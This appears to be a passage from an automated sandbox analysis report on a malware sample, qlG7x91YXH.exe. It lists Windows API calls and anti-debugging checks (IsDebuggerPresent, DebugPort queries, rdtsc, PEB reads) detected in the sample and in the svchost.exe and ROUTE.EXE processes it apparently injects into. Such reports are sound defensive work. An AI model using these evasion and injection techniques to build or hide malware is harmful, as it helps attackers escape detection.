                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9B2B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5C97
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AACB20 FindFirstFileW,FindNextFileW,FindClose,6_2_02AACB20
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3015420785.000000000127F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2581420078.000001EFDAADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417C33 LdrLoadDll,1_2_00417C33
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DEEAA2 BlockInput,0_2_00DEEAA2
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA2622
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D94CE8 mov eax, dword ptr fs:[00000030h]0_2_00D94CE8
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_01044740 mov eax, dword ptr fs:[00000030h]0_2_01044740
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_010446E0 mov eax, dword ptr fs:[00000030h]0_2_010446E0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_010430E0 mov eax, dword ptr fs:[00000030h]0_2_010430E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
